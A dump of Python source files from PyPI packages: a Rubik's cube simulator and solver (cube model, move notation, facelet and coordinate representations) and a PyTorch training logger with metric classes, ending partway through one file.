def E(self): self._rotate_slice(X_AXIS + Z_AXIS, ROT_XZ_CC)
def Ei(self): self._rotate_slice(X_AXIS + Z_AXIS, ROT_XZ_CW)
def S(self): self._rotate_slice(X_AXIS + Y_AXIS, ROT_XY_CW)
def Si(self): self._rotate_slice(X_AXIS + Y_AXIS, ROT_XY_CC)
def X(self): self._rotate_pieces(self.pieces, ROT_YZ_CW)
def Xi(self): self._rotate_pieces(self.pieces, ROT_YZ_CC)
def Y(self): self._rotate_pieces(self.pieces, ROT_XZ_CW)
def Yi(self): self._rotate_pieces(self.pieces, ROT_XZ_CC)
def Z(self): self._rotate_pieces(self.pieces, ROT_XY_CW)
def Zi(self): self._rotate_pieces(self.pieces, ROT_XY_CC)
def sequence(self, move_str):
"""
:param moves: A string containing notated moves separated by spaces: "L Ri U M Ui B M"
"""
moves = [getattr(self, name) for name in move_str.split()]
for move in moves:
move()
def find_piece(self, *colors):
if None in colors:
return
for p in self.pieces:
if p.colors.count(None) == 3 - len(colors) \
and all(c in p.colors for c in colors):
return p
def get_piece(self, x, y, z):
"""
:return: the Piece at the given Point
"""
point = Point(x, y, z)
for p in self.pieces:
if p.pos == point:
return p
def __getitem__(self, *args):
if len(args) == 1:
return self.get_piece(*args[0])
return self.get_piece(*args)
def __eq__(self, other):
return isinstance(other, Cube) and self._color_list() == other._color_list()
def __ne__(self, other):
return not (self == other)
def colors(self):
"""
:return: A set containing the colors of all stickers on the cube
"""
return set(c for piece in self.pieces for c in piece.colors if c is not None)
def left_color(self): return self[LEFT].colors[0]
def right_color(self): return self[RIGHT].colors[0]
def up_color(self): return self[UP].colors[1]
def down_color(self): return self[DOWN].colors[1]
def front_color(self): return self[FRONT].colors[2]
def back_color(self): return self[BACK].colors[2]
def _color_list(self):
right = [p.colors[0] for p in sorted(self._face(RIGHT), key=lambda p: (-p.pos.y, -p.pos.z))]
left = [p.colors[0] for p in sorted(self._face(LEFT), key=lambda p: (-p.pos.y, p.pos.z))]
up = [p.colors[1] for p in sorted(self._face(UP), key=lambda p: (p.pos.z, p.pos.x))]
down = [p.colors[1] for p in sorted(self._face(DOWN), key=lambda p: (-p.pos.z, p.pos.x))]
front = [p.colors[2] for p in sorted(self._face(FRONT), key=lambda p: (-p.pos.y, p.pos.x))]
back = [p.colors[2] for p in sorted(self._face(BACK), key=lambda p: (-p.pos.y, -p.pos.x))]
return (up + left[0:3] + front[0:3] + right[0:3] + back[0:3]
+ left[3:6] + front[3:6] + right[3:6] + back[3:6]
+ left[6:9] + front[6:9] + right[6:9] + back[6:9] + down)
def flat_str(self):
return "".join(x for x in str(self) if x not in string.whitespace)
def __str__(self):
template = (" {}{}{}\n"
" {}{}{}\n"
" {}{}{}\n"
"{}{}{} {}{}{} {}{}{} {}{}{}\n"
"{}{}{} {}{}{} {}{}{} {}{}{}\n"
"{}{}{} {}{}{} {}{}{} {}{}{}\n"
" {}{}{}\n"
" {}{}{}\n"
" {}{}{}")
return " " + template.format(*self._color_list()).strip()
if __name__ == '__main__':
cube = Cube(" DLU\n"
" RRD\n"
" FFU\n"
"BBL DDR BRB LDL\n"
"RBF RUU LFB DDU\n"
"FBR BBR FUD FLU\n"
" DLU\n"
" ULF\n"
" LFR")
print(cube) | /rubik-cube-0.0.2.tar.gz/rubik-cube-0.0.2/rubik/cube.py | 0.815269 | 0.620392 | cube.py | pypi |
import os
import csv
import torch
from PIL import Image
from torchvision.utils import make_grid, save_image
from torch.utils.tensorboard import SummaryWriter
try:
from torch.utils.tensorboard.summary import hparams
except:
hparams = lambda x, y: (0, 0, 0)
# Epoch for message logging and iteration for value logging
class Logger():
def __init__(self, config, cli_log = True, f_log = True, tb_log = True):
''' CLI, file and tensorboard logger '''
self.cli = CLILogger(cli_log)
self.f = FileLogger(config['data']['run_dir'], f_log)
self.tb = TensorBoardLogger(config['data']['run_dir'], tb_log)
self.loggers = [self.f, self.tb, self.cli]
def log_images(self, img_name, images):
if images.shape[1] > 3:
images = images.sum(dim = 1, keepdim = True)
for logger in self.loggers:
logger.log_images(img_name, images)
def log_message(self, message, epoch):
for logger in self.loggers:
logger.log_message(message, epoch)
def log_value(self, value_name, value, iteration, epoch):
for logger in self.loggers:
logger.log_value(value_name, value, iteration, epoch)
def log_hparams(self, hparam, metrics):
for logger in self.loggers:
logger.log_hparams(hparam, metrics)
def log_graph(self, model, data):
self.tb.log_graph(model, data)
# Extra layer has to have string name of the layer
def log_grad(self, model, iteration, num_layer = 3, extra_layers = []):
selected_layers = self.select_layers(model, num_layer, extra_layers)
for name, parameters in model.named_parameters():
true_name = name.split('.')[0]
if true_name in selected_layers:
self.tb.log_grad(name, parameters.grad, iteration)
def select_layers(self, model, num_layer, extra_layers):
all_layers = []
for name, _ in model.named_parameters():
true_name = name.split('.')[0]
if true_name not in all_layers: all_layers.append(true_name)
# Select layers according to layers
selected_layers = []
for i in range(num_layer - 1):
factor = int(len(all_layers) / (num_layer - 1))
selected_layers.append(all_layers[i * factor])
selected_layers.append(all_layers[-1])
selected_layers.extend(extra_layers)
return selected_layers
def close(self):
self.tb.close()
class CLILogger():
def __init__(self, enable = True):
self.disable = not enable
def log_images(self, img_name, images):
if self.disable: return
print('Image {}.png is saved.'.format(img_name))
def log_message(self, message, epoch):
if self.disable: return
print('epoch: {}, msg: {}'.format(epoch, message))
def log_value(self, value_name, value, iteration, epoch):
if self.disable: return
print('ep: {}, iter: {}, {}: {}'.format(epoch, iteration,
value_name, value))
def log_hparams(self, hparam, metrics):
if self.disable: return
if not metrics is None:
hparam.update(metrics)
print('Hyperparameter: \n {}'.format(hparam))
class FileLogger():
def __init__(self, log_dir, enable = True):
self.disable = not enable
self.metrics_dicts = []
self.metrics_column = ['epoch', 'iteration'] # Avoid repetitive add
self.metrics_file = self.init_file('metrics.csv', log_dir)
self.message_file = self.init_file('log.txt', log_dir)
self.hparam_file = self.init_file('hparam.csv', log_dir)
self.data_dir = self.init_dir('data', log_dir)
def init_file(self, file_name, save_dir):
if self.disable: return
file_dir = '{}/{}'.format(save_dir, file_name)
if os.path.exists(file_dir):
raise Exception('File {} exists!'.format(file_dir))
return file_dir
def init_dir(self, dir_name, save_dir):
if self.disable: return
sub_dir = '{}/{}'.format(save_dir, dir_name)
if os.path.exists(sub_dir):
raise Exception('Path {} exists!'.format(sub_dir))
else:
os.mkdir(sub_dir)
return sub_dir
def log_images(self, img_name, images):
if self.disable: return
img_grid = make_grid(images)
save_image(img_grid, '{}/{}.png'.format(self.data_dir, img_name))
def log_message(self, message, epoch):
if self.disable: return
with open(self.message_file, 'a') as f:
f.write('epoch: {} | {}\n'.format(epoch, message))
def log_value(self, value_name, value, iteration, epoch):
if self.disable: return
m_dicts = self.metrics_dicts
if len(m_dicts) == 0 or m_dicts[-1]['iteration'] != iteration:
m_dicts.append({'epoch' : epoch,
'iteration' : iteration,
value_name : value})
else:
m_dicts[-1][value_name] = value
if value_name not in self.metrics_column:
self.metrics_column.append(value_name)
with open(self.metrics_file, 'w') as f:
writer = csv.DictWriter(f,
fieldnames = self.metrics_column,
restval = 'NaN')
writer.writeheader()
for data in m_dicts:
writer.writerow(data)
def log_hparams(self, hparam, metrics):
if self.disable: return
if not metrics is None:
hparam.update(metrics)
with open(self.hparam_file, 'w') as f:
writer = csv.writer(f)
for key, value in hparam.items():
writer.writerow([key, value])
class TensorBoardLogger():
def __init__(self, log_dir, enable = True):
self.writer = ModSummaryWriter(log_dir)
self.disable = not enable
def log_images(self, img_name, images):
if self.disable: return
img_grid = make_grid(images)
self.writer.add_image(img_name, img_grid)
def log_value(self, value_name, value, iteration, epoch):
if self.disable: return
self.writer.add_scalar(value_name, value, iteration)
def log_message(self, message, epoch):
if self.disable: return
self.writer.add_text('log', message, epoch)
def log_hparams(self, hparam, metrics):
if self.disable: return
self.writer.add_mod_hparams(hparam, metrics)
def log_graph(self, model, data):
if self.disable: return
self.writer.add_graph(model, data)
def log_grad(self, name, data, iteration):
if self.disable: return
self.writer.add_histogram(name, data, iteration)
def close(self):
self.writer.close()
# Custom Hparam Writer that prevent split folders
# https://github.com/pytorch/pytorch/issues/32651#issuecomment-643791116
class ModSummaryWriter(SummaryWriter):
def add_mod_hparams(self, hparam_dict, metric_dict):
torch._C._log_api_usage_once("tensorboard.logging.add_hparams")
if type(hparam_dict) is not dict or type(metric_dict) is not dict:
raise TypeError('hparam_dict and metric_dict should be dictionary.')
exp, ssi, sei = hparams(hparam_dict, metric_dict)
logdir = self._get_file_writer().get_logdir()
self.file_writer.add_summary(exp)
self.file_writer.add_summary(ssi)
self.file_writer.add_summary(sei)
for k, v in metric_dict.items():
self.add_scalar(k, v) | /rubik-pytorch-0.1.1.tar.gz/rubik-pytorch-0.1.1/rubik/logger.py | 0.708515 | 0.194827 | logger.py | pypi |
import numpy as np
import torch
import sklearn.metrics as sk_metrics
class Metric():
'''
Metrics holds values during accumulation and reduce to stats in the \
end, should be aware of memory issue when saving all scores with \
with large datasets. Also hold the best metrics/epoch for the run.
'''
def __init__(self):
self.memory = []
self.best_result = None
self.best_epoch = None
def reset_memory(self):
self.memory = []
def step_wrap(self, output_data):
stats = self.step(output_data)
self.memory.append(stats)
def reduce_wrap(self, config):
result = self.reduce(self.memory, config)
self.update_result(result, config)
self.reset_memory()
return result
def update_result(self, new, config):
current_epoch = config['data']['current_epoch']
old = self.best_result
if self.best_result is None or self.select_better(old, new) == new:
self.best_result = new
self.best_epoch = current_epoch
def get_best(self):
'''
Get the best result from current run
Returns:
float: best result of this metric
int: epoch where the best result is reached
'''
return self.best_result, self.best_epoch
def step(self, output_data):
'''
Store scores to avoid large RAM usage
Args:
output_data (tuple): Output from train function has form: \
``loss.item(), inputs, outputs, labels`` or form defined \
by customized train function.
Returns:
list: an array of transformed stats for computation.
'''
raise NotImplementedError('Accumulation not implemented')
def reduce(self, memory, config):
'''
Reduce arrays using the format in the accumulation phase
Args:
config (dict): Determine global progress, Metric is memoryless.
'''
raise NotImplementedError('Reduce not implemented')
def select_better(self, old, new):
'''
Select the better metrics from two metrics
Args:
old (float): old metrics data
new (float): new metrics data
Returns:
float: old or new metrics
'''
raise NotImplementedError('Reduce not implemented')
class Loss(Metric):
def step(self, outputs):
loss, inputs, outputs, labels = outputs
return loss
def reduce(self, memory, config):
return sum(memory) / len(memory)
def select_better(self, old, new):
return min(old, new)
class Accuracy(Metric):
def step(self, output_data):
loss, inputs, outputs, labels = output_data
return outputs, labels
def reduce(self, memory, config):
outputs = [entry[0] for entry in memory]
labels = [entry[1] for entry in memory]
outputs = torch.argmax(torch.cat(outputs), dim = 1).cpu().numpy()
labels = torch.cat(labels).cpu().numpy()
score = sk_metrics.accuracy_score(labels, outputs)
return score
def select_better(self, old, new):
return max(old, new)
class AUC(Metric):
def step(self, output_data):
loss, inputs, outputs, labels = output_data
return outputs, labels
def reduce(self, memory, config):
outputs = [entry[0] for entry in memory]
labels = [entry[1] for entry in memory]
outputs = self.softmax(torch.cat(outputs).cpu().numpy())[:, 1]
labels = torch.cat(labels).cpu().numpy()
score = sk_metrics.roc_auc_score(labels, outputs)
return score
def softmax(self, x):
return np.exp(x) / np.exp(x).sum(axis = 1, keepdims = True)
def select_better(self, old, new):
return max(old, new)
class F1(Metric):
def step(self, output_data):
loss, inputs, outputs, labels = output_data
return outputs, labels
def reduce(self, memory, config):
outputs = [entry[0] for entry in memory]
labels = [entry[1] for entry in memory]
outputs = torch.argmax(torch.cat(outputs), dim = 1).cpu().numpy()
labels = torch.cat(labels).cpu().numpy()
score = sk_metrics.f1_score(labels, outputs)
return score
def select_better(self, old, new):
return max(old, new) | /rubik-pytorch-0.1.1.tar.gz/rubik-pytorch-0.1.1/rubik/metrics.py | 0.928059 | 0.482795 | metrics.py | pypi |
import random
from past.builtins import basestring
from copy import deepcopy
from .Move import Move
from .NaiveCube import NaiveCube
class Sticker(object):
COLOURS = ['w', 'r', 'b', 'g', 'y', 'o', '.']
def __init__(self, color):
if color.lower() not in self.COLOURS:
raise ValueError("Color %s is not one of %s" %
(color, ', '.join(self.COLOURS)))
self.color = color.lower()
def __repr__(self):
return self.color.upper()
def __str__(self):
return self.__repr__()
def __lt__(self, o):
if isinstance(o, basestring):
return self.color.upper() < o.upper()
elif isinstance(o, Sticker):
return self.color.upper() < o.color.upper()
else:
raise TypeError("Don't know how to compare Sticker with %s" % o.__class__.__name__)
def __gt__(self, o):
if isinstance(o, basestring):
return self.color.upper() > o.upper()
elif isinstance(o, Sticker):
return self.color.upper() > o.color.upper()
else:
raise TypeError("Don't know how to compare Sticker with %s" % o.__class__.__name__)
def __le__(self, o):
return (self < o) or (self == o)
def __ge__(self, o):
return (self > o) or (self == o)
def __eq__(self, o):
if isinstance(o, basestring):
return o.upper() == self.color.upper()
elif isinstance(o, Sticker):
return o.color.upper() == self.color.upper()
else:
raise TypeError("Don't know how to compare Sticker with %s" % o.__class__.__name__)
def __ne__(self, o):
return not(o == self)
class Cubie(object):
FACINGS = 'FBRLUD'
COLORS = 'ROGBYW'
def __init__(self, **kwargs):
self.facings = {}
for key, value in kwargs.items():
key = key.upper()
if key not in self.FACINGS:
raise ValueError("Face %s is not one of %s" %
(key, ', '.join(list(self.FACINGS))))
self.facings[key] = Sticker(value)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, ', '.join(['%s: %s' % (k, v) for k, v in self.facings.items()]))
@property
def faces(self):
return self.facings.keys()
@property
def colors(self):
return self.facings.values()
@staticmethod
def facing_to_color(facing):
return Cubie.COLORS[Cubie.FACINGS.index(facing.upper())]
@staticmethod
def color_to_facing(color):
return Cubie.FACINGS[Cubie.COLORS.index(color.upper())]
def color_facing(self, c):
for facing, color in self.facings.items():
if color == c:
return facing
return None
class Center(Cubie):
def __init__(self, **kwargs):
if len(kwargs) != 1:
raise ValueError("Center must have only 1 Sticker")
super(Center, self).__init__(**kwargs)
class Edge(Cubie):
def __init__(self, **kwargs):
if len(kwargs) != 2:
raise ValueError("Center must have only 2 Stickers")
super(Edge, self).__init__(**kwargs)
class Corner(Cubie):
def __init__(self, **kwargs):
if len(kwargs) != 3:
raise ValueError("Center must have only 3 Stickers")
super(Corner, self).__init__(**kwargs)
class Cube(object):
CUBIES = [
'FLU', 'FU', 'FRU', 'FL', 'F', 'FR', 'DFL', 'DF', 'DFR',
'BLU', 'BU', 'BRU', 'BL', 'B', 'BR', 'BDL', 'BD', 'BDR',
'LU', 'L', 'DL',
'RU', 'R', 'DR',
'D', 'U'
]
CUBE_MAP = [
# UP
['BLU', 'U'], ['BU', 'U'], ['BRU', 'U'],
['UL', 'U' ], ['U', 'U' ], ['UR', 'U' ],
['FLU', 'U'], ['FU', 'U'], ['FRU', 'U'],
# LEFT
['BLU', 'L'], ['UL', 'L'], ['FLU', 'L'],
['BL', 'L' ], ['L', 'L' ], ['FL', 'L' ],
['BLD', 'L'], ['DL', 'L'], ['FLD', 'L'],
# FRONT
['FLU', 'F'], ['FU', 'F'], ['FRU', 'F'],
['FL', 'F' ], ['F', 'F' ], ['FR', 'F' ],
['FLD', 'F'], ['FD', 'F'], ['FRD', 'F'],
# RIGHT
['FRU', 'R'], ['UR', 'R'], ['BRU', 'R'],
['FR', 'R' ], ['R', 'R' ], ['BR', 'R' ],
['FRD', 'R'], ['DR', 'R'], ['BRD', 'R'],
# BACK
['BRU', 'B'], ['BU', 'B'], ['BLU', 'B'],
['BR', 'B' ], ['B', 'B' ], ['BL', 'B' ],
['BRD', 'B'], ['BD', 'B'], ['BLD', 'B'],
# DOWN
['FLD', 'D'], ['FD', 'D'], ['FRD', 'D'],
['DL', 'D' ], ['D', 'D' ], ['DR', 'D' ],
['BLD', 'D'], ['BD', 'D'], ['BRD', 'D'],
]
MOVES = {
'F': [
('FLU', 'FUR'),
('FUR', 'FRD'),
('FRD', 'FDL'),
('FDL', 'FLU'),
('FU', 'FR'),
('FR', 'FD'),
('FD', 'FL'),
('FL', 'FU'),
],
'B': [
('BLU', 'BDL'),
('BDL', 'BRD'),
('BRD', 'BUR'),
('BUR', 'BLU'),
('BU', 'BL'),
('BL', 'BD'),
('BD', 'BR'),
('BR', 'BU'),
],
'R': [
('RFU', 'RUB'),
('RUB', 'RBD'),
('RBD', 'RDF'),
('RDF', 'RFU'),
('RU', 'RB'),
('RB', 'RD'),
('RD', 'RF'),
('RF', 'RU'),
],
'L': [
('LFU', 'LDF'),
('LDF', 'LBD'),
('LBD', 'LUB'),
('LUB', 'LFU'),
('LU', 'LF'),
('LF', 'LD'),
('LD', 'LB'),
('LB', 'LU'),
],
'U': [
('ULB', 'UBR'),
('UBR', 'URF'),
('URF', 'UFL'),
('UFL', 'ULB'),
('UB', 'UR'),
('UR', 'UF'),
('UF', 'UL'),
('UL', 'UB'),
],
'D': [
('DFL', 'DRF'),
('DRF', 'DBR'),
('DBR', 'DLB'),
('DLB', 'DFL'),
('DF', 'DR'),
('DR', 'DB'),
('DB', 'DL'),
('DL', 'DF'),
],
'X': [
],
'Y': [
],
'Z': [
],
'M': [
],
'E': [
],
'S': [
]
}
def __init__(self, size=3):
self.__reset_cube()
# It currently has no sense
self.size = size
def __reset_cube(self):
self.cubies = {}
for cubie in self.CUBIES:
# Sorting the key allows to access the dict in an unified manner
cubie = self._t_key(cubie)
if len(cubie) == 3:
self.cubies[cubie] = Corner(
**dict([(face, Cubie.facing_to_color(face)) for face in cubie]))
elif len(cubie) == 2:
self.cubies[cubie] = Edge(
**dict([(face, Cubie.facing_to_color(face)) for face in cubie]))
else:
self.cubies[cubie] = Center(
**dict([(face, Cubie.facing_to_color(face)) for face in cubie]))
@staticmethod
def _t_key(key):
return ''.join(sorted(key))
def from_naive_cube(self, cube):
for i, color in enumerate(cube.get_cube()):
cube_map = self.CUBE_MAP[i]
cube_map[0] = self._t_key(cube_map[0])
self.cubies[cube_map[0]].facings[cube_map[1]] = Sticker(color)
def to_naive_cube(self):
configuration = ''
for cubie, face in self.CUBE_MAP:
cubie = self._t_key(cubie)
configuration += self.cubies[cubie].facings[face].color
nc = NaiveCube(self.size)
nc.set_cube(configuration)
return nc
@staticmethod
def move_changes(move):
if not isinstance(move, Move):
raise ValueError("Move must be an instance of Move")
changes = Cube.MOVES[move.face]
if move.counterclockwise:
changes = [(c1, c0) for c0, c1 in changes]
return changes
def move(self, move):
changes = Cube.move_changes(move)
original_cubies = {}
for c_origin, c_dest in changes:
c_t_origin = self._t_key(c_origin)
origin_cubie = original_cubies[c_t_origin] if c_t_origin in original_cubies else self.cubies[c_t_origin]
dest_cubie = self.cubies[self._t_key(c_dest)]
original_cubies[self._t_key(c_dest)] = deepcopy(dest_cubie)
for i, origin_facing in enumerate(c_origin):
dest_facing = c_dest[i]
dest_cubie.facings[dest_facing] = origin_cubie.facings[origin_facing]
if move.double:
self.move(Move(move.face))
def shuffle(self, seed=None):
self.__reset_cube()
random.seed(seed)
sequence = []
for _ in range(random.randint(100, 150)):
m = Move(random.choice(Cubie.FACINGS) + random.choice(" 2'"))
sequence.append(m)
self.move(m)
return sequence
def search_by_colors(self, *args):
args = tuple(sorted(set(map(str.upper, map(str, args)))))
for key, cubie in self.cubies.items():
cubie_colors = tuple(sorted([str(c).upper() for c in cubie.facings.values()]))
if args == cubie_colors:
return key
return None
Cube.MOVES['M'].extend([
('UB', 'FU'),
('BD', 'UB'),
('DF', 'BD'),
('FU', 'DF'),
('U', 'F'),
('B', 'U'),
('D', 'B'),
('F', 'D'),
])
Cube.MOVES['E'].extend([
('LF', 'FR'),
('BL', 'LF'),
('RB', 'BL'),
('FR', 'RB'),
('L', 'F'),
('B', 'L'),
('R', 'B'),
('F', 'R'),
])
Cube.MOVES['S'].extend([
('UL', 'RU'),
('RU', 'DR'),
('DR', 'LD'),
('LD', 'UL'),
('U', 'R'),
('R', 'D'),
('D', 'L'),
('L', 'U'),
])
# Build Cube Axis MOVES
Cube.MOVES['X'].extend(Cube.move_changes(Move("R")))
Cube.MOVES['X'].extend(Cube.move_changes(Move("L'")))
Cube.MOVES['X'].extend(Cube.move_changes(Move("M'")))
Cube.MOVES['Y'].extend(Cube.move_changes(Move("U")))
Cube.MOVES['Y'].extend(Cube.move_changes(Move("D'")))
Cube.MOVES['Y'].extend(Cube.move_changes(Move("E'")))
Cube.MOVES['Z'].extend(Cube.move_changes(Move("F")))
Cube.MOVES['Z'].extend(Cube.move_changes(Move("B'")))
Cube.MOVES['Z'].extend(Cube.move_changes(Move("S"))) | /rubik_solver-0.2.0.tar.gz/rubik_solver-0.2.0/rubik_solver/Cubie.py | 0.651133 | 0.171165 | Cubie.py | pypi |
from past.builtins import basestring
import re
class Move(object):
def __init__(self, move):
if not re.match("[fblrudxyzmse]'?2?", move, re.I):
raise ValueError("Invalid move format, must be [face]' or [face]2, got %s" % move)
self.raw = move.upper()
@property
def face(self):
return self.raw[0].upper()
@face.setter
def face(self, new_face):
self.raw = new_face + self.raw[1:]
@property
def double(self):
return '2' in self.raw
@double.setter
def double(self, new_double):
if new_double:
self.raw = self.raw.replace('2', '').replace("'", '') + '2'
else:
self.raw = self.raw.replace('2', '').replace("'", '')
@property
def counterclockwise(self):
return "'" in self.raw
@counterclockwise.setter
def counterclockwise(self, value):
if value:
self.raw = self.raw.replace("'", '').replace("2", '') + "'"
else:
self.raw = self.raw.replace("'", '').replace("2", '')
@property
def clockwise(self):
return not self.counterclockwise and not self.double
@clockwise.setter
def clockwise(self, value):
self.counterclockwise = not value
def reverse(self):
return Move(self.face + ("'" if self.clockwise else "2" if self.double else ""))
def __eq__(self, move):
if isinstance(move, (str, basestring)):
return self.raw == move.upper()
elif isinstance(move, Move):
return self.raw == move.raw
else:
return False
def __str__(self):
return self.raw
def __repr__(self):
return str(self)
def __ne__(self, move):
return not self == move
def __add__(self, move):
if isinstance(move, (str, basestring)):
return self + Move(move)
elif move is None:
return self
elif isinstance(move, Move):
if self.face != move.face:
raise ValueError("Only same faces can be added")
if self.clockwise and move.counterclockwise:
return None
if self.double and move.double:
return None
offset = (
(self.clockwise + (self.double * 2) + (self.counterclockwise * 3)) +
(move.clockwise + (move.double * 2) + (move.counterclockwise * 3))
) % 4
if offset == 0:
return None
return Move(self.face + [None, "", "2", "'"][offset])
else:
raise ValueError("Unable to add %s and %s" %(self.raw, str(move)))
def __mul__(self, times):
offset = ((self.clockwise + (self.double * 2) + (self.counterclockwise * 3)) * times % 4)
if offset == 0:
return None
return Move(self.face + [None, "", "2", "'"][offset]) | /rubik_solver-0.2.0.tar.gz/rubik_solver-0.2.0/rubik_solver/Move.py | 0.738198 | 0.247612 | Move.py | pypi |
from .Enums import Facelet, Color, Edge, Corner
from .CubieCube import CubieCube
class FaceCube(object):
'''Cube on the facelet level
Map the corner positions to facelet positions. cornerFacelet[URF.ordinal()][0] e.g. gives the position of the
facelet in the URF corner position, which defines the orientation.<br>
cornerFacelet[URF.ordinal()][1] and cornerFacelet[URF.ordinal()][2] give the position of the other two facelets
'''
cornerFacelet = [
[Facelet.U9, Facelet.R1, Facelet.F3],
[Facelet.U7, Facelet.F1, Facelet.L3],
[Facelet.U1, Facelet.L1, Facelet.B3],
[Facelet.U3, Facelet.B1, Facelet.R3],
[Facelet.D3, Facelet.F9, Facelet.R7],
[Facelet.D1, Facelet.L9, Facelet.F7],
[Facelet.D7, Facelet.B9, Facelet.L7],
[Facelet.D9, Facelet.R9, Facelet.B7]
]
'''Map the edge positions to facelet positions. edgeFacelet[UR.ordinal()][0] e.g. gives the position of the facelet in
the UR edge position, which defines the orientation.<br>
edgeFacelet[UR.ordinal()][1] gives the position of the other facelet
'''
edgeFacelet = [
[Facelet.U6, Facelet.R2],
[Facelet.U8, Facelet.F2],
[Facelet.U4, Facelet.L2],
[Facelet.U2, Facelet.B2],
[Facelet.D6, Facelet.R8],
[Facelet.D2, Facelet.F8],
[Facelet.D4, Facelet.L8],
[Facelet.D8, Facelet.B8],
[Facelet.F6, Facelet.R4],
[Facelet.F4, Facelet.L6],
[Facelet.B6, Facelet.L4],
[Facelet.B4, Facelet.R6]
]
'''Map the corner positions to facelet colors.'''
cornerColor = [
[Color.U, Color.R, Color.F],
[Color.U, Color.F, Color.L],
[Color.U, Color.L, Color.B],
[Color.U, Color.B, Color.R],
[Color.D, Color.F, Color.R],
[Color.D, Color.L, Color.F],
[Color.D, Color.B, Color.L],
[Color.D, Color.R, Color.B]
]
'''Map the edge positions to facelet colors.'''
edgeColor = [
[Color.U, Color.R],
[Color.U, Color.F],
[Color.U, Color.L],
[Color.U, Color.B],
[Color.D, Color.R],
[Color.D, Color.F],
[Color.D, Color.L],
[Color.D, Color.B],
[Color.F, Color.R],
[Color.F, Color.L],
[Color.B, Color.L],
[Color.B, Color.R]
]
def __init__(self, cubeString = "UUUUUUUUURRRRRRRRRFFFFFFFFFDDDDDDDDDLLLLLLLLLBBBBBBBBB"):
self.f = [0] * 54
for i in range(54):
self.f[i] = getattr(Color, cubeString[i])
def to_String(self):
'''Gives string representation of a facelet cube'''
s = ""
for i in range(54):
s += Color.reverse_mapping[self.f[i]]
return s
def toCubieCube(self):
'''Gives CubieCube representation of a faceletcube'''
ccRet = CubieCube()
for i in range(8):
ccRet.cp[i] = Corner.URF # invalidate corners
for i in range(12):
ccRet.ep[i] = Edge.UR # and edges
for i in Corner.reverse_mapping.keys():
# get the colors of the cubie at corner i, starting with U/D
for ori in range(3):
if (self.f[FaceCube.cornerFacelet[i][ori]] == Color.U) or (self.f[FaceCube.cornerFacelet[i][ori]] == Color.D):
break
else:
ori = 3
col1 = self.f[FaceCube.cornerFacelet[i][(ori + 1) % 3]]
col2 = self.f[FaceCube.cornerFacelet[i][(ori + 2) % 3]]
for j in Corner.reverse_mapping.keys():
if (col1 == FaceCube.cornerColor[j][1]) and (col2 == FaceCube.cornerColor[j][2]):
ccRet.cp[i] = j
ccRet.co[i] = ori % 3
break
for i in Edge.reverse_mapping.keys():
for j in Edge.reverse_mapping.keys():
if (self.f[FaceCube.edgeFacelet[i][0]] == FaceCube.edgeColor[j][0]) and (self.f[FaceCube.edgeFacelet[i][1]] == FaceCube.edgeColor[j][1]):
ccRet.ep[i] = j
ccRet.eo[i] = 0
if (self.f[FaceCube.edgeFacelet[i][0]] == FaceCube.edgeColor[j][1]) and (self.f[FaceCube.edgeFacelet[i][1]] == FaceCube.edgeColor[j][0]):
ccRet.ep[i] = j
ccRet.eo[i] = 1
break
return ccRet | /rubik_solver-0.2.0.tar.gz/rubik_solver-0.2.0/rubik_solver/FaceCube.py | 0.595493 | 0.767712 | FaceCube.py | pypi |
import os
from ..CubieCube import CubieCube
class CoordCube(object):
'''Representation of the cube on the coordinate level'''
N_TWIST = 2187 # 3^7 possible corner orientations
N_FLIP = 2048 # 2^11 possible edge flips
N_SLICE1 = 495 # 12 choose 4 possible positions of FR,FL,BL,BR edges
N_SLICE2 = 24 # 4! permutations of FR,FL,BL,BR edges in phase2
N_PARITY = 2 # 2 possible corner parities
N_URFtoDLF = 20160 # 8!/(8-6)! permutation of URF,UFL,ULB,UBR,DFR,DLF corners
N_FRtoBR = 11880 # 12!/(12-4)! permutation of FR,FL,BL,BR edges
N_URtoUL = 1320 # 12!/(12-3)! permutation of UR,UF,UL edges
N_UBtoDF = 1320 # 12!/(12-3)! permutation of UB,DR,DF edges
N_URtoDF = 20160 # 8!/(8-6)! permutation of UR,UF,UL,UB,DR,DF edges in phase2
N_URFtoDLB = 40320 # 8! permutations of the corners
N_URtoBR = 479001600 # 8! permutations of the corners
N_MOVE = 18
# twistMove = [[0 for _ in range(N_MOVE)] for _ in range( N_TWIST )] ## CUIDADO CON LAS REFERENCIAS
# flipMove = [[0 for _ in range(N_MOVE)] for _ in range( N_FLIP )]
# FRtoBR_Move = [[0 for _ in range(N_MOVE)] for _ in range( N_FRtoBR )]
# URFtoDLF_Move = [[0 for _ in range(N_MOVE)] for _ in range( N_URFtoDLF )]
# URtoDF_Move = [[0 for _ in range(N_MOVE)] for _ in range( N_URtoDF )]
# URtoUL_Move = [[0 for _ in range(N_MOVE)] for _ in range( N_URtoUL )]
# UBtoDF_Move = [[0 for _ in range(N_MOVE)] for _ in range( N_UBtoDF )]
# MergeURtoULandUBtoDF = [[0 for _ in range(336)] for _ in range( 336 )]
# Slice_URFtoDLF_Parity_Prun = [-1] * (N_SLICE2 * N_URFtoDLF * N_PARITY // 2)
# Slice_URtoDF_Parity_Prun = [-1] * (N_SLICE2 * N_URtoDF * N_PARITY // 2)
# Slice_Twist_Prun = [-1] * (N_SLICE1 * N_TWIST // 2 + 1)
# Slice_Flip_Prun = [-1] * (N_SLICE1 * N_FLIP // 2)
## Parity of the corner permutation. This is the same as the parity for the edge permutation of a valid cube.
## parity has values 0 and 1
parityMove = [
[1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1],
[0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0]
]
@staticmethod
def setPruning(table, index, value):
if (index & 1) == 0:
table[index // 2] &= (0xf0 | value)
else:
table[index // 2] &= (0x0f | (value << 4))
@staticmethod
def getPruning(table, index):
if (index & 1) == 0:
return table[index // 2] & 0x0f
else:
return (table[index // 2] & 0xf0) >> 4
def __init__(self, c):
''' c is a CubieCube instance'''
if not isinstance(c, CubieCube):
raise ValueError('c must be a CubieCube instance, got %s' % c.__class__.__name__)
self.twist = c.getTwist()
self.flip = c.getFlip()
self.parity = c.cornerParity()
self.FRtoBR = c.getFRtoBR()
self.URFtoDLF = c.getURFtoDLF()
self.URtoUL = c.getURtoUL()
self.UBtoDF = c.getUBtoDF()
self.URtoDF = c.getURtoDF() # only needed in phase2
def move(self, m):
'''A move on the coordinate level'''
self.twist = self.twistMove[self.twist][m]
self.flip = self.flipMove[self.flip][m]
